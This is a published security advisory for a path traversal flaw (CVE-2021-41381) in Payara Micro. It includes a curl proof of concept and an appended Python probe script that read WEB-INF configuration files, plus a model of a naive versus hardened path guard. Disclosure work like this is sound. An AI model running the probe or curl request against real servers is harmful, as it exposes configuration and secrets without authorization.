-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-054
Product: Payara® Micro Community
Manufacturer: 2021 Payara Services Ltd
Affected Version(s): 5.2021.6 (JAR) and below (?)
Tested Version(s): 5.2021.6 (JAR)
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2021-08-26
Solution Date: 2021-09-16
Public Disclosure: 2021-09-22
CVE Reference: CVE-2021-41381
Author of Advisory: Thibaud Kehler, Oliver Maicher, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Payara® Micro Enterprise & Community are Java web servers.

The manufacturer describes the product as follows (see [1]):

"Payara Micro Enterprise is the lightweight middleware platform of choice
for containerized Jakarta EE application deployments. Less than 80MB,
Payara Micro requires no installation, configuration, or code rewrites –
so you can build and deploy a fully working app within minutes."

When an application is deployed with the context root set to "/", Payara
Micro is vulnerable to path traversal. An unauthenticated client can read
resources inside the web application archive (.war file) that a servlet
container must never serve directly, such as the contents of WEB-INF.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Deploying an application with the "--contextroot" option set to "/" makes
it vulnerable to path traversal attacks:

$ java -jar payara-micro.jar --deploy /home/user/myexample.war --contextroot /

myexample.war has the following structure:

.
├── WEB-INF
│   ├── classes
│   │   └── META-INF
│   │       └── microprofile-config.properties
│   └── META-INF
├── META-INF
│   └── MANIFEST.MF
└── index.xhtml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

With the context root set to "/", a request path beginning with "/.//"
traverses into the WEB-INF folder, so files that should never be served
can be read, for instance the MicroProfile configuration:
Request (--path-as-is keeps curl from collapsing "/.//" before sending):

curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Response:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to the September 2021 Payara Platform release, which mitigates the
path traversal via "/.//".

More information:
https://blog.payara.fish/whats-new-in-the-september-2021-payara-platform-release

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-08-26: Vulnerability reported to manufacturer
2021-09-15: Release of update and vulnerability fix
2021-09-22: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Payara® Micro Enterprise
    https://www.payara.fish/products/payara-micro/
[2] SySS Security Advisory SYSS-2021-054
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler and Oliver Maicher
of SySS GmbH.

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB6457D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQGzBAEBCgAdFiEEN3sQKd08ITCK8zmrKBT3NJWK3okFAmFLG70ACgkQKBT3NJWK
3ok8XwwAnUfbspF6ffcaXKpXSgkAhrfWuDLQQ+tmDyf7LnIz+ngglMYFw5bWiqTp
U2TJeCbqf+16kyKieFXxcsjXVfFsmPQYOz/TNvbyWnJ7o8Vmgdh8mZLG9L29bGAa
uv6iKrvJJtGdyFdxOh6Dl40//5WGJiAvXcCYhbnRpaz7AjrZM0p6uCt2V8rniblb
eDzHAOPYZ5Snqu8o20lJbtV/5JnCLcUEaM9uVDHnCdcszfQrC/9kQY33xLWemfiP
tfmUczMavX58qnVSnH5OzXeMNPJAYWbZSX8lxyr2NWH2hUqtT9bRnoo7xF+sfNxb
RwmmYYqzFa45KBiatbCrbQaK34JCCQtnK8xBQmTER/HCaR0wdYIWXkNz1cSA7H8m
djVn8jrl5cWt3iGPvRU2ymkofaHTCidNfCVoNFgDVoNmtr1wWye3jE+++tBYvrz9
5vMbkWAFymd5SeKppZ2QkBZgLhpff4qFdh2u0LSt4m/3a7enF2jJNjnpLT8VZ23t
XkrAhjYy
=LTcA
-----END PGP SIGNATURE-----
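The proof of concept above is a single curl command. The following Python script is an added example, not part of the SySS advisory and not Payara's code: it packages the same "/.//WEB-INF/..." request as a reusable probe that sends the request line verbatim (the http.client equivalent of curl --path-as-is), and beside it shows the bug class the advisory classifies as CWE-22 with a guard that checks the raw request path before normalization next to one that normalizes first. The naive and hardened guards, the in-memory stand-in for myexample.war and the loopback stub server are all constructed for illustration; they are not a reconstruction of how Payara Micro resolves paths internally.

```python
"""Probe for the "/.//WEB-INF" traversal from SYSS-2021-054 and a model of the bug class.

Added example. The guards, the sample WAR contents and the stub server are
hypothetical illustrations, not Payara's implementation.
"""
import http.client
import posixpath
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

PROTECTED = ("WEB-INF", "META-INF")  # directories a servlet container must never serve
TRAVERSAL_PATH = "/.//WEB-INF/classes/META-INF/microprofile-config.properties"

# Constructed stand-in for the contents of myexample.war (not real data).
SAMPLE_WAR = {
    "/index.xhtml": b"<html>hello</html>",
    "/WEB-INF/classes/META-INF/microprofile-config.properties": b"db.password=constructed-sample\n",
}


def canonical(request_path: str) -> str:
    """Percent-decode, collapse '//' and '/./', resolve '..' and keep the result rooted at '/'."""
    return posixpath.normpath("/" + unquote(request_path).lstrip("/"))


def naive_is_protected(request_path: str) -> bool:
    """Prefix check on the raw request path. Bypassed by '/.//WEB-INF/...' because the
    file lookup that runs afterwards normalizes the path while this check does not."""
    upper = request_path.upper()
    return any(upper.startswith("/" + name + "/") or upper == "/" + name for name in PROTECTED)


def hardened_is_protected(request_path: str) -> bool:
    """Normalize first, then refuse any path with a WEB-INF or META-INF segment anywhere."""
    return any(seg.upper() in PROTECTED for seg in canonical(request_path).split("/"))


def serve(request_path: str, is_protected) -> tuple:
    """Model of the container: the guard sees the raw path, the lookup uses the canonical one."""
    if is_protected(request_path):
        return 404, b""
    body = SAMPLE_WAR.get(canonical(request_path))
    return (200, body) if body is not None else (404, b"")


def probe(host: str, port: int, path: str = TRAVERSAL_PATH, timeout: float = 5.0) -> tuple:
    """Send the request target verbatim (http.client does not normalize it, like
    curl --path-as-is) and return (status, body). 200 with a body means the host is exposed."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def _handler_for(is_protected):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            status, body = serve(self.path, is_protected)  # self.path is the raw request target
            self.send_response(status)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the demo quiet
            pass

    return Handler


def probe_local_stub(is_protected) -> int:
    """Start a loopback stub that uses the given guard, probe it once, return the HTTP status."""
    server = HTTPServer(("127.0.0.1", 0), _handler_for(is_protected))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", server.server_address[1])[0]
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("naive guard   :", probe_local_stub(naive_is_protected))     # 200: file exposed
    print("hardened guard:", probe_local_stub(hardened_is_protected))  # 404: blocked
```

Against a real deployment, `probe("target-host", 8080)` returns 200 and the properties file if the host is still exposed; a fixed host answers with a non-200 status. The stub only models the ordering mistake (guard before normalization); a production container additionally has to strip path parameters such as ";jsessionid=..." and handle backslashes and repeated decoding before the guard runs, which this example does not attempt.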